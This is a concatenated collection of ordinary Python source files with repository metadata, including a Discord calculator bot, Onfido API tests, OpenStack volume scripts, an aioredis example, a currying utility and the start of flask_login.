term = factor + ZeroOrMore((multop + factor).setParseAction(self.pushFirst))
expr << term + ZeroOrMore((addop + term).setParseAction(self.pushFirst))
# addop_term = (addop + term).setParseAction(self.pushFirst)
# general_term = term + ZeroOrMore(addop_term) | OneOrMore(addop_term)
# expr << general_term
self.bnf = expr
# this will map operator symbols to their corresponding arithmetic operations
epsilon = 1e-12
self.opn = {
"+" : operator.add,
"-" : operator.sub,
"*" : operator.mul,
"/" : operator.truediv,
"^" : operator.pow }
self.fn = {
"sin" : math.sin,
"cos" : math.cos,
"tan" : math.tan,
"abs" : abs,
"trunc" : lambda a: int(a),
"round" : round,
"sgn" : lambda a: abs(a)>epsilon and cmp(a,0) or 0}
def evaluateStack(self, s):
op = s.pop()
if op == 'unary -':
return -self.evaluateStack(s)
if op in "+-*/^":
op2 = self.evaluateStack(s)
op1 = self.evaluateStack(s)
return self.opn[op](op1, op2)
elif op == "PI":
return math.pi # 3.1415926535
elif op == "E":
return math.e # 2.718281828
elif op in self.fn:
return self.fn[op](self.evaluateStack(s))
elif op[0].isalpha():
return 0
else:
return float(op)
def eval(self,num_string,parseAll=True):
self.exprStack=[]
results=self.bnf.parseString(num_string,parseAll)
val=self.evaluateStack(self.exprStack[:])
return val
class Calculator:
# Init with the bot reference, and a reference to the settings var
def __init__(self, bot):
self.bot = bot
self.nsp=NumericStringParserForPython3()
self.user_color = discord.Colour(0xed791d) ## orange
self.mod_color = discord.Colour(0x7289da) ## blurple
@commands.command(description='Scientific calculator', aliases=['calculate', 'maths'])
async def calc(self, ctx, *, formula = None):
""" ✔ Do some math
thanks to Paul McGuire's fourFn.py. """
person = ctx.message.author
formula = formula.replace('x', '*').replace(' minus ', '-').replace(' plus ', '+').replace(' into ', '/') \
.replace(' sub ', '-').replace(' pi ', 'PI').replace(' divide ', '/').replace(' multiply ', '*') \
.replace(' add ', '+').replace(' div ', '/').replace(' multi ', '*').replace(' mul ', '*') \
.replace('π', 'PI').replace('÷', '/')
if formula == None:
# How can it calculate an empty message? Reee!
msg = f'\u200BUsage: `{ctx.prefix}{ctx.invoked_with} [any maths formula]`'
e = discord.Embed(color=self.user_color)
e.description = msg
try:
await ctx.send(embed=e, delete_after=23)
except discord.HTTPException:
await ctx.send(msg, delete_after=23)
return
try:
answer=self.nsp.eval(formula)
except:
# If there's a problem in the input, show examples
msg = f'\N{THINKING FACE} wrong `{formula}` input.\n\nTry any of these:'
e = discord.Embed(color=self.user_color)
e.description = f'\u200B{msg}'
e.add_field(name='multiply', value='`2 * 3 x 5 multiply 7`')
e.add_field(name='divide', value='`91 / 5 divide 3 into 2 ÷ 4`')
e.add_field(name='add', value='`1 + 4 plus 8 add 23`')
e.add_field(name='substract', value='`91 - 35 minus 3 sub 12`')
e.add_field(name='exponential', value="`7 ^ 5`")
e.add_field(name='Supported formulas',
value='```py\nround((cos(45) + (3+7^2)*2 + tan(369.18)) / π - 3)```')
try:
await ctx.send(embed=e, delete_after=23)
except discord.HTTPException:
error = f'\N{THINKING FACE} wrong `{formula}` input.\n\n ' \
f'Try any of these:```py\nround((cos(45) + (3+7^2)*2 + tan(369.18)) / π - 3)```'
await ctx.send(error, delete_after=23)
return
# Correct input prints correct answer
distance = self.bot or self.bot.message
duration = f'Calculated in {distance.ws.latency * 1000:.2f} ms'
success = round(answer, 2)
e = discord.Embed(color=self.user_color)
e.add_field(name='Input:', value=f'```py\n{formula}```', inline=True)
e.add_field(name='Result:', value=f'```css\n{success}```', inline=True)
e.set_footer(text=duration)
try:
await ctx.send(embed=e)
except discord.Forbidden: # FORBIDDEN (status code: 403): Missing Permissions
await ctx.send(f'```rust\n>Input: {formula}\nResult: {success}```')
def setup(bot):
bot.add_cog(Calculator(bot))
| 41.320652
| 123
| 0.544916
|
from __future__ import division
import discord, math, operator
from discord.ext import commands
from pyparsing import (Literal,CaselessLiteral,Word,Combine,Group,Optional,
ZeroOrMore,Forward,nums,alphas,oneOf)
__author__='Paul McGuire'
__version__ = '$Revision: 0.0 $'
__date__ = '$Date: 2009-03-20 $'
__source__ = """http://pyparsing.wikispaces.com/file/view/fourFn.py
http://pyparsing.wikispaces.com/message/view/home/15549426
"""
__note__ = """
This is a re-wrap of Paul McGuire's fourFn.py as a class, so it can
be used easily in other places of the code. Most of the work wad done
by corpnewt, all I did was clean it and create the results in embeds.
Also, the messages are deleted after, except for the correct answer.
"""
class NumericStringParserForPython3(object):
def pushFirst(self, strg, loc, toks):
self.exprStack.append(toks[0])
def pushUMinus(self, strg, loc, toks):
if toks and toks[0]=='-':
self.exprStack.append('unary -')
def __init__(self):
point = Literal(".")
e = CaselessLiteral("E")
fnumber = Combine(Word("+-"+nums, nums) +
Optional(point + Optional(Word(nums))) +
Optional(e + Word("+-"+nums, nums)))
ident = Word(alphas, alphas+nums+"_$")
plus = Literal("+")
minus = Literal("-")
mult = Literal("*")
div = Literal("/")
lpar = Literal("(").suppress()
rpar = Literal(")").suppress()
addop = plus | minus
multop = mult | div
expop = Literal("^")
pi = CaselessLiteral("PI")
expr = Forward()
atom = ((Optional(oneOf("- +")) +
(pi|e|fnumber|ident+lpar+expr+rpar).setParseAction(self.pushFirst))
| Optional(oneOf("- +")) + Group(lpar+expr+rpar)
).setParseAction(self.pushUMinus)
# by defining exponentiation as "atom [ ^ factor ]..." instead of
# "atom [ ^ atom ]...", we get right-to-left exponents, instead of left-to-right
# that is, 2^3^2 = 2^(3^2), not (2^3)^2.
factor = Forward()
factor << atom + ZeroOrMore((expop + factor).setParseAction(self.pushFirst))
term = factor + ZeroOrMore((multop + factor).setParseAction(self.pushFirst))
expr << term + ZeroOrMore((addop + term).setParseAction(self.pushFirst))
# addop_term = (addop + term).setParseAction(self.pushFirst)
# general_term = term + ZeroOrMore(addop_term) | OneOrMore(addop_term)
# expr << general_term
self.bnf = expr
# this will map operator symbols to their corresponding arithmetic operations
epsilon = 1e-12
self.opn = {
"+" : operator.add,
"-" : operator.sub,
"*" : operator.mul,
"/" : operator.truediv,
"^" : operator.pow }
self.fn = {
"sin" : math.sin,
"cos" : math.cos,
"tan" : math.tan,
"abs" : abs,
"trunc" : lambda a: int(a),
"round" : round,
"sgn" : lambda a: abs(a)>epsilon and cmp(a,0) or 0}
def evaluateStack(self, s):
op = s.pop()
if op == 'unary -':
return -self.evaluateStack(s)
if op in "+-*/^":
op2 = self.evaluateStack(s)
op1 = self.evaluateStack(s)
return self.opn[op](op1, op2)
elif op == "PI":
return math.pi # 3.1415926535
elif op == "E":
return math.e # 2.718281828
elif op in self.fn:
return self.fn[op](self.evaluateStack(s))
elif op[0].isalpha():
return 0
else:
return float(op)
def eval(self,num_string,parseAll=True):
self.exprStack=[]
results=self.bnf.parseString(num_string,parseAll)
val=self.evaluateStack(self.exprStack[:])
return val
class Calculator:
# Init with the bot reference, and a reference to the settings var
def __init__(self, bot):
self.bot = bot
self.nsp=NumericStringParserForPython3()
self.user_color = discord.Colour(0xed791d) ## orange
self.mod_color = discord.Colour(0x7289da) ## blurple
@commands.command(description='Scientific calculator', aliases=['calculate', 'maths'])
async def calc(self, ctx, *, formula = None):
person = ctx.message.author
formula = formula.replace('x', '*').replace(' minus ', '-').replace(' plus ', '+').replace(' into ', '/') \
.replace(' sub ', '-').replace(' pi ', 'PI').replace(' divide ', '/').replace(' multiply ', '*') \
.replace(' add ', '+').replace(' div ', '/').replace(' multi ', '*').replace(' mul ', '*') \
.replace('π', 'PI').replace('÷', '/')
if formula == None:
# How can it calculate an empty message? Reee!
msg = f'\u200BUsage: `{ctx.prefix}{ctx.invoked_with} [any maths formula]`'
e = discord.Embed(color=self.user_color)
e.description = msg
try:
await ctx.send(embed=e, delete_after=23)
except discord.HTTPException:
await ctx.send(msg, delete_after=23)
return
try:
answer=self.nsp.eval(formula)
except:
# If there's a problem in the input, show examples
msg = f'\N{THINKING FACE} wrong `{formula}` input.\n\nTry any of these:'
e = discord.Embed(color=self.user_color)
e.description = f'\u200B{msg}'
e.add_field(name='multiply', value='`2 * 3 x 5 multiply 7`')
e.add_field(name='divide', value='`91 / 5 divide 3 into 2 ÷ 4`')
e.add_field(name='add', value='`1 + 4 plus 8 add 23`')
e.add_field(name='substract', value='`91 - 35 minus 3 sub 12`')
e.add_field(name='exponential', value="`7 ^ 5`")
e.add_field(name='Supported formulas',
value='```py\nround((cos(45) + (3+7^2)*2 + tan(369.18)) / π - 3)```')
try:
await ctx.send(embed=e, delete_after=23)
except discord.HTTPException:
error = f'\N{THINKING FACE} wrong `{formula}` input.\n\n ' \
f'Try any of these:```py\nround((cos(45) + (3+7^2)*2 + tan(369.18)) / π - 3)```'
await ctx.send(error, delete_after=23)
return
distance = self.bot or self.bot.message
duration = f'Calculated in {distance.ws.latency * 1000:.2f} ms'
success = round(answer, 2)
e = discord.Embed(color=self.user_color)
e.add_field(name='Input:', value=f'```py\n{formula}```', inline=True)
e.add_field(name='Result:', value=f'```css\n{success}```', inline=True)
e.set_footer(text=duration)
try:
await ctx.send(embed=e)
except discord.Forbidden:
await ctx.send(f'```rust\n>Input: {formula}\nResult: {success}```')
def setup(bot):
bot.add_cog(Calculator(bot))
| true
| true
|
f7051188a962d569b2fe5523b4fb6cc5f81e0849
| 1,304
|
py
|
Python
|
tests/test_live_photos.py
|
onfido/onfido-python
|
e779347f04dd7891987c2c915047fd039f6d7742
|
[
"MIT"
] | 16
|
2020-06-30T15:35:42.000Z
|
2022-02-12T09:26:41.000Z
|
tests/test_live_photos.py
|
onfido/onfido-python
|
e779347f04dd7891987c2c915047fd039f6d7742
|
[
"MIT"
] | 6
|
2020-07-06T08:56:33.000Z
|
2021-07-12T18:09:07.000Z
|
tests/test_live_photos.py
|
onfido/onfido-python
|
e779347f04dd7891987c2c915047fd039f6d7742
|
[
"MIT"
] | 5
|
2020-08-18T08:12:19.000Z
|
2021-05-26T11:43:53.000Z
|
import onfido
from onfido.regions import Region
import io
api = onfido.Api("<AN_API_TOKEN>", region=Region.EU)
fake_uuid = "58a9c6d2-8661-4dbd-96dc-b9b9d344a7ce"
def test_upload_photo(requests_mock):
mock_upload = requests_mock.post("https://api.eu.onfido.com/v3.2/live_photos/", json=[])
sample_file = open("sample_photo.png", "rb")
request_body = {"advanced_validation": "true"}
api.live_photo.upload(sample_file, request_body)
assert mock_upload.called is True
def test_find_live_photo(requests_mock):
mock_find = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/{fake_uuid}", json=[])
api.live_photo.find(fake_uuid)
assert mock_find.called is True
def test_list_live_photos(requests_mock):
mock_list = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/?applicant_id={fake_uuid}", json=[])
api.live_photo.all(fake_uuid)
assert mock_list.called is True
def test_download_live_photo(requests_mock):
mock_download = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/{fake_uuid}/download", text="FAKE IMAGE BINARY", headers={"Content-type": "image/png"})
onfido_download = api.live_photo.download(fake_uuid)
assert mock_download.called is True
assert onfido_download.content_type == "image/png"
| 37.257143
| 170
| 0.751534
|
import onfido
from onfido.regions import Region
import io
api = onfido.Api("<AN_API_TOKEN>", region=Region.EU)
fake_uuid = "58a9c6d2-8661-4dbd-96dc-b9b9d344a7ce"
def test_upload_photo(requests_mock):
mock_upload = requests_mock.post("https://api.eu.onfido.com/v3.2/live_photos/", json=[])
sample_file = open("sample_photo.png", "rb")
request_body = {"advanced_validation": "true"}
api.live_photo.upload(sample_file, request_body)
assert mock_upload.called is True
def test_find_live_photo(requests_mock):
mock_find = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/{fake_uuid}", json=[])
api.live_photo.find(fake_uuid)
assert mock_find.called is True
def test_list_live_photos(requests_mock):
mock_list = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/?applicant_id={fake_uuid}", json=[])
api.live_photo.all(fake_uuid)
assert mock_list.called is True
def test_download_live_photo(requests_mock):
mock_download = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/{fake_uuid}/download", text="FAKE IMAGE BINARY", headers={"Content-type": "image/png"})
onfido_download = api.live_photo.download(fake_uuid)
assert mock_download.called is True
assert onfido_download.content_type == "image/png"
| true
| true
|
f705121c1bad013c291364ae04075091589dbba5
| 1,042
|
py
|
Python
|
_/chapter5-OpenStack/BlockStoreService/VolumeOperations.py
|
paullewallencom/hybrid-cloud-978-1-7888-3087-4
|
d101553fd342f420b581b87c58c7219f2b04a7c6
|
[
"Apache-2.0"
] | 3
|
2018-03-27T14:34:48.000Z
|
2021-10-04T16:28:19.000Z
|
_/chapter5-OpenStack/BlockStoreService/VolumeOperations.py
|
paullewallencom/hybrid-cloud-978-1-7888-3087-4
|
d101553fd342f420b581b87c58c7219f2b04a7c6
|
[
"Apache-2.0"
] | null | null | null |
_/chapter5-OpenStack/BlockStoreService/VolumeOperations.py
|
paullewallencom/hybrid-cloud-978-1-7888-3087-4
|
d101553fd342f420b581b87c58c7219f2b04a7c6
|
[
"Apache-2.0"
] | 1
|
2021-08-27T23:51:28.000Z
|
2021-08-27T23:51:28.000Z
|
#import OpenStack connection class from the SDK
from openstack import connection
# Create a connection object by calling the constructor and pass the security information
conn = connection.Connection(auth_url="http://192.168.0.106/identity",
project_name="demo",
username="admin",
password="manoj",
user_domain_id="default",
project_domain_id="default")
def create_volume(conn):
volume_properties = {'size':'2', 'name':'packtpub-volume-2'}
volume = conn.block_store.create_volume(**volume_properties)
def delete_volume(conn):
volume_id = "3b064701-aaa7-418a-9df7-cad52bd549ee"
conn.block_store.delete_volume(volume_id)
def create_snapshot(conn):
snapshot_properties = {'volume_id':'3b064701-aaa7-418a-9df7-cad52bd549ee'}
snapshot = conn.block_store.create_snapshot(**snapshot_properties)
def delete_snapshot(conn):
snapshot_id = "91ac5916-0baa-469e-ac4e-e37b2a3880dc"
conn.block_store.delete_snapshot(snapshot_id)
#create_snapshot(conn)
#delete_snapshot(conn)
#delete_volume(conn)
create_volume(conn)
| 29.771429
| 89
| 0.779271
|
from openstack import connection
conn = connection.Connection(auth_url="http://192.168.0.106/identity",
project_name="demo",
username="admin",
password="manoj",
user_domain_id="default",
project_domain_id="default")
def create_volume(conn):
volume_properties = {'size':'2', 'name':'packtpub-volume-2'}
volume = conn.block_store.create_volume(**volume_properties)
def delete_volume(conn):
volume_id = "3b064701-aaa7-418a-9df7-cad52bd549ee"
conn.block_store.delete_volume(volume_id)
def create_snapshot(conn):
snapshot_properties = {'volume_id':'3b064701-aaa7-418a-9df7-cad52bd549ee'}
snapshot = conn.block_store.create_snapshot(**snapshot_properties)
def delete_snapshot(conn):
snapshot_id = "91ac5916-0baa-469e-ac4e-e37b2a3880dc"
conn.block_store.delete_snapshot(snapshot_id)
create_volume(conn)
| true
| true
|
f70513caa49442a4e72d71bac1f20f80278b0b7c
| 107
|
py
|
Python
|
{{cookiecutter.project_slug}}/src/{{cookiecutter.project_slug}}/__init__.py
|
JDongian/cookiecutter-pypackage
|
2e7c0d3a623755373560ee68fcb6a162085638c0
|
[
"Apache-2.0"
] | 2
|
2019-06-12T23:29:41.000Z
|
2019-06-25T20:35:47.000Z
|
{{cookiecutter.project_slug}}/src/{{cookiecutter.project_slug}}/__init__.py
|
JDongian/cookiecutter-pypackage
|
2e7c0d3a623755373560ee68fcb6a162085638c0
|
[
"Apache-2.0"
] | 4
|
2018-02-09T06:24:59.000Z
|
2019-01-23T06:46:11.000Z
|
{{cookiecutter.project_slug}}/src/{{cookiecutter.project_slug}}/__init__.py
|
JDongian/cookiecutter-pypackage
|
2e7c0d3a623755373560ee68fcb6a162085638c0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Top-level package for {{ cookiecutter.project_name }}"""
__version__ = '0.0.1'
| 21.4
| 59
| 0.616822
|
__version__ = '0.0.1'
| true
| true
|
f70513f071c9fec7e830d9232516ac75706443c6
| 10
|
py
|
Python
|
example_snippets/multimenus_snippets/Snippets/NumPy/Vectorized (universal) functions/Trigonometric and hyperbolic functions/tanh Compute hyperbolic tangent element-wise.py
|
kuanpern/jupyterlab-snippets-multimenus
|
477f51cfdbad7409eab45abe53cf774cd70f380c
|
[
"BSD-3-Clause"
] | null | null | null |
example_snippets/multimenus_snippets/Snippets/NumPy/Vectorized (universal) functions/Trigonometric and hyperbolic functions/tanh Compute hyperbolic tangent element-wise.py
|
kuanpern/jupyterlab-snippets-multimenus
|
477f51cfdbad7409eab45abe53cf774cd70f380c
|
[
"BSD-3-Clause"
] | null | null | null |
example_snippets/multimenus_snippets/Snippets/NumPy/Vectorized (universal) functions/Trigonometric and hyperbolic functions/tanh Compute hyperbolic tangent element-wise.py
|
kuanpern/jupyterlab-snippets-multimenus
|
477f51cfdbad7409eab45abe53cf774cd70f380c
|
[
"BSD-3-Clause"
] | 1
|
2021-02-04T04:51:48.000Z
|
2021-02-04T04:51:48.000Z
|
np.tanh(x)
| 10
| 10
| 0.7
|
np.tanh(x)
| true
| true
|
f705141e5f48b22c12903c1fa1a907b58b1375d4
| 366
|
py
|
Python
|
examples/getting_started/06_sentinel.py
|
emorozov/aioredis
|
bad0bd2d1435e56688d189cf3209beec3d239557
|
[
"MIT"
] | null | null | null |
examples/getting_started/06_sentinel.py
|
emorozov/aioredis
|
bad0bd2d1435e56688d189cf3209beec3d239557
|
[
"MIT"
] | 75
|
2020-12-09T06:53:47.000Z
|
2022-03-25T01:05:24.000Z
|
examples/getting_started/06_sentinel.py
|
emorozov/aioredis
|
bad0bd2d1435e56688d189cf3209beec3d239557
|
[
"MIT"
] | null | null | null |
import asyncio
import aioredis
async def main():
sentinel = await aioredis.create_sentinel(
["redis://localhost:26379", "redis://sentinel2:26379"]
)
redis = sentinel.master_for("mymaster")
ok = await redis.set("key", "value")
assert ok
val = await redis.get("key", encoding="utf-8")
assert val == "value"
asyncio.run(main())
| 20.333333
| 62
| 0.639344
|
import asyncio
import aioredis
async def main():
sentinel = await aioredis.create_sentinel(
["redis://localhost:26379", "redis://sentinel2:26379"]
)
redis = sentinel.master_for("mymaster")
ok = await redis.set("key", "value")
assert ok
val = await redis.get("key", encoding="utf-8")
assert val == "value"
asyncio.run(main())
| true
| true
|
f705170d03d2dd066c58fc27f04b0e6e4b224eb2
| 1,573
|
py
|
Python
|
app/Resource/ImageResource.py
|
ansabkhaliq/backend
|
14bad9b44bfec6ea4ba27d1571ddcf614ff762c6
|
[
"MIT"
] | null | null | null |
app/Resource/ImageResource.py
|
ansabkhaliq/backend
|
14bad9b44bfec6ea4ba27d1571ddcf614ff762c6
|
[
"MIT"
] | 11
|
2020-09-22T11:15:09.000Z
|
2020-11-03T21:45:18.000Z
|
app/Resource/ImageResource.py
|
ansabkhaliq/backend
|
14bad9b44bfec6ea4ba27d1571ddcf614ff762c6
|
[
"MIT"
] | 2
|
2020-09-21T19:20:44.000Z
|
2021-03-21T04:46:19.000Z
|
import logging
from .DatabaseBase import DatabaseBase
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
class ImageResource(DatabaseBase):
def __init__(self):
super().__init__()
def get_product_images_by_id(self, id):
search_image_query = """Select * From images where productId = %s """
values = [id]
image_records = self.run_query(search_image_query, values, False)
return image_records
def get_threed_link_by_product_id(self, pid):
select_query = """ Select * from images where is3DModelType = 'Y' and productId = %s"""
values = [str(pid)]
records = self.run_query(select_query, values, True)
if records is None:
return None
return records[0]
def update_threed_link(self, url, id_list):
update_query = """UPDATE images SET threeDModelLocation = %s WHERE productId =%s and is3DModelType = 'Y' """
for id in id_list:
self.run_query(update_query, [url, id], False)
def insert_threed_model(self, url, id_list):
insert_query = """INSERT INTO images(threeDModelLocation, is3DModelType, productId) VALUES (%s, %s, %s)"""
values = []
for id in id_list:
temp = (url, 'Y', str(id))
values.append(temp)
try:
self.run_query_many(insert_query, values, True)
except Exception as e:
self.connection.rollback()
logger.error('Exception occurred when inserting order', e)
return 0
return 1
| 34.195652
| 117
| 0.633185
|
import logging
from .DatabaseBase import DatabaseBase
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
class ImageResource(DatabaseBase):
def __init__(self):
super().__init__()
def get_product_images_by_id(self, id):
search_image_query = """Select * From images where productId = %s """
values = [id]
image_records = self.run_query(search_image_query, values, False)
return image_records
def get_threed_link_by_product_id(self, pid):
select_query = """ Select * from images where is3DModelType = 'Y' and productId = %s"""
values = [str(pid)]
records = self.run_query(select_query, values, True)
if records is None:
return None
return records[0]
def update_threed_link(self, url, id_list):
update_query = """UPDATE images SET threeDModelLocation = %s WHERE productId =%s and is3DModelType = 'Y' """
for id in id_list:
self.run_query(update_query, [url, id], False)
def insert_threed_model(self, url, id_list):
insert_query = """INSERT INTO images(threeDModelLocation, is3DModelType, productId) VALUES (%s, %s, %s)"""
values = []
for id in id_list:
temp = (url, 'Y', str(id))
values.append(temp)
try:
self.run_query_many(insert_query, values, True)
except Exception as e:
self.connection.rollback()
logger.error('Exception occurred when inserting order', e)
return 0
return 1
| true
| true
|
f705181e0f045be38f7e9fa0b37412575523e61a
| 915
|
py
|
Python
|
weather_api/weather_api/urls.py
|
brian-duffy/yoyo-test
|
65700a0061022e326a0048695c122ea2cfb5d5fe
|
[
"OML"
] | null | null | null |
weather_api/weather_api/urls.py
|
brian-duffy/yoyo-test
|
65700a0061022e326a0048695c122ea2cfb5d5fe
|
[
"OML"
] | 12
|
2019-12-26T16:40:09.000Z
|
2022-03-11T23:17:44.000Z
|
weather_api/weather_api/urls.py
|
brian-duffy/yoyo-test
|
65700a0061022e326a0048695c122ea2cfb5d5fe
|
[
"OML"
] | null | null | null |
"""weather_api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.views.generic import RedirectView
urlpatterns = [
url(r'^$', RedirectView.as_view(url='https://github.com/brian-duffy/yoyo-test/blob/master/README.md')),
url(r'weather_app/', include('weather_app.urls')),
]
| 38.125
| 107
| 0.711475
|
from django.conf.urls import url, include
from django.views.generic import RedirectView
urlpatterns = [
url(r'^$', RedirectView.as_view(url='https://github.com/brian-duffy/yoyo-test/blob/master/README.md')),
url(r'weather_app/', include('weather_app.urls')),
]
| true
| true
|
f705183f4fbd0db80b7cc60b42c57b39c75bdeac
| 2,196
|
py
|
Python
|
curry.py
|
christianscott/curry.py
|
2a8ef4b40853dff6b239f794fcc0e3f9a157d7ab
|
[
"MIT"
] | 2
|
2020-10-02T19:04:38.000Z
|
2021-10-01T10:51:14.000Z
|
curry.py
|
christianscott/curry.py
|
2a8ef4b40853dff6b239f794fcc0e3f9a157d7ab
|
[
"MIT"
] | 3
|
2019-09-09T09:41:10.000Z
|
2019-09-09T09:41:33.000Z
|
curry.py
|
christianscott/curry.py
|
2a8ef4b40853dff6b239f794fcc0e3f9a157d7ab
|
[
"MIT"
] | 1
|
2021-10-01T10:51:15.000Z
|
2021-10-01T10:51:15.000Z
|
"""Utility for currying functions."""
from functools import wraps
from inspect import signature, isbuiltin, isclass
def curry(func, args=None, kwargs=None, n=None, use_defaults=False):
if use_defaults:
return CurriedDefault(func, args, kwargs, n)
return Curried(func, args, kwargs, n)
class Curried:
def __init__(self, func, args=None, kwargs=None, target_arg_count=None):
if not callable(func):
raise TypeError('first argument must be callable')
wraps(func)(self)
self.func = func
self.args = or_else(args, tuple())
self.kwargs = or_else(kwargs, dict())
self.target_arg_count = or_else(target_arg_count, get_target_arg_count(func))
def __call__(self, *new_args, **new_kwargs):
args = self.args + new_args
kwargs = self.kwargs.copy()
kwargs.update(new_kwargs)
if self._have_enough_args(args, kwargs):
return self.func(*args, **kwargs)
return self._clone(args, kwargs)
def _clone(self, args, kwargs):
return Curried(self.func, args, kwargs, self.target_arg_count)
def _have_enough_args(self, args, kwargs):
return current_count(args, kwargs) == self.target_arg_count
class CurriedDefault(Curried):
def _clone(self, args, kwargs):
return CurriedDefault(self.func, args, kwargs, self.target_arg_count)
def _have_enough_args(self, args, kwargs):
count = current_count(args, kwargs)
return count == self.target_arg_count or count == (self.target_arg_count - count_defaults(self.func))
def or_else(x, default):
return x if x is not None else default
def current_count(next_args, next_kwargs):
return len(next_args) + len(next_kwargs)
def count_defaults(func):
length = 0
if func.__defaults__ is not None:
length += len(func.__defaults__)
if func.__kwdefaults__ is not None:
length += len(func.__kwdefaults__)
return length
def get_target_arg_count(func):
if isclass(func) or isbuiltin(func):
# builtins, e.g. `map`, refer to class rather than fn
func = func.__call__
sig = signature(func)
return len(sig.parameters)
| 28.519481
| 109
| 0.676685
|
from functools import wraps
from inspect import signature, isbuiltin, isclass
def curry(func, args=None, kwargs=None, n=None, use_defaults=False):
if use_defaults:
return CurriedDefault(func, args, kwargs, n)
return Curried(func, args, kwargs, n)
class Curried:
def __init__(self, func, args=None, kwargs=None, target_arg_count=None):
if not callable(func):
raise TypeError('first argument must be callable')
wraps(func)(self)
self.func = func
self.args = or_else(args, tuple())
self.kwargs = or_else(kwargs, dict())
self.target_arg_count = or_else(target_arg_count, get_target_arg_count(func))
def __call__(self, *new_args, **new_kwargs):
args = self.args + new_args
kwargs = self.kwargs.copy()
kwargs.update(new_kwargs)
if self._have_enough_args(args, kwargs):
return self.func(*args, **kwargs)
return self._clone(args, kwargs)
def _clone(self, args, kwargs):
return Curried(self.func, args, kwargs, self.target_arg_count)
def _have_enough_args(self, args, kwargs):
return current_count(args, kwargs) == self.target_arg_count
class CurriedDefault(Curried):
def _clone(self, args, kwargs):
return CurriedDefault(self.func, args, kwargs, self.target_arg_count)
def _have_enough_args(self, args, kwargs):
count = current_count(args, kwargs)
return count == self.target_arg_count or count == (self.target_arg_count - count_defaults(self.func))
def or_else(x, default):
return x if x is not None else default
def current_count(next_args, next_kwargs):
return len(next_args) + len(next_kwargs)
def count_defaults(func):
length = 0
if func.__defaults__ is not None:
length += len(func.__defaults__)
if func.__kwdefaults__ is not None:
length += len(func.__kwdefaults__)
return length
def get_target_arg_count(func):
if isclass(func) or isbuiltin(func):
func = func.__call__
sig = signature(func)
return len(sig.parameters)
| true
| true
|
f7051948f84339215d44128dbd1290fdb16a154f
| 786
|
py
|
Python
|
datalad/interface/download_url.py
|
AKSoo/datalad
|
dbc34478980c808a86b5531316c986abac953e37
|
[
"MIT"
] | null | null | null |
datalad/interface/download_url.py
|
AKSoo/datalad
|
dbc34478980c808a86b5531316c986abac953e37
|
[
"MIT"
] | 1
|
2020-12-01T20:13:51.000Z
|
2020-12-01T20:13:51.000Z
|
datalad/interface/download_url.py
|
jwodder/datalad
|
2b92a764fdc64b750dad68eb51c817218a1ec153
|
[
"MIT"
] | null | null | null |
# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 et:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Obsolete module: moved to `local.download_url`
"""
import warnings
warnings.warn(
"DownloadURL has been moved to datalad.local.download_url. "
"This module was deprecated in 0.16.0, and will be removed in a future "
"release. Please adjust the import.",
DeprecationWarning)
# Import command class to ease 3rd-party transitions
from datalad.local.download_url import DownloadURL
| 37.428571
| 87
| 0.57888
| true
| true
|
|
f7051a146cd3b773029e9815898f0cb11b731acd
| 30,749
|
py
|
Python
|
venv/lib/python2.7/site-packages/flask_login.py
|
jessekl/twiliochallenge
|
2bba8bc2e0928880f1e2abe6b53b96dbc67ef34f
|
[
"MIT"
] | 2
|
2015-11-05T09:43:45.000Z
|
2017-05-31T14:22:02.000Z
|
flask/lib/site-packages/flask_login.py
|
CodingForChange/praquemdoar
|
575d67d211473f352adcd9d7c405c7a5cf18fc6e
|
[
"Apache-2.0"
] | null | null | null |
flask/lib/site-packages/flask_login.py
|
CodingForChange/praquemdoar
|
575d67d211473f352adcd9d7c405c7a5cf18fc6e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
flask.ext.login
---------------
This module provides user session management for Flask. It lets you log
your users in and out in a database-independent manner.
:copyright: (c) 2011 by Matthew Frazier.
:license: MIT/X11, see LICENSE for more details.
'''
__version_info__ = ('0', '2', '10')
__version__ = '.'.join(__version_info__)
__author__ = 'Matthew Frazier'
__license__ = 'MIT/X11'
__copyright__ = '(c) 2011 by Matthew Frazier'
__all__ = ['LoginManager']
from flask import (_request_ctx_stack, abort, current_app, flash, redirect,
request, session, url_for, has_request_context)
from flask.signals import Namespace
from werkzeug.local import LocalProxy
from werkzeug.security import safe_str_cmp
from werkzeug.urls import url_decode, url_encode
from datetime import datetime, timedelta
from functools import wraps
from hashlib import sha1, md5
import hmac
import warnings
import sys
if sys.version < '3': # pragma: no cover
from urlparse import urlparse, urlunparse
else: # pragma: no cover
from urllib.parse import urlparse, urlunparse
unicode = str
_signals = Namespace()
#: A proxy for the current user. If no user is logged in, this will be an
#: anonymous user
current_user = LocalProxy(lambda: _get_user())
#: The default name of the "remember me" cookie (``remember_token``)
COOKIE_NAME = 'remember_token'
#: The default time before the "remember me" cookie expires (365 days).
COOKIE_DURATION = timedelta(days=365)
#: Whether the "remember me" cookie requires Secure; defaults to ``None``
COOKIE_SECURE = None
#: Whether the "remember me" cookie uses HttpOnly or not; defaults to ``False``
COOKIE_HTTPONLY = False
#: The default flash message to display when users need to log in.
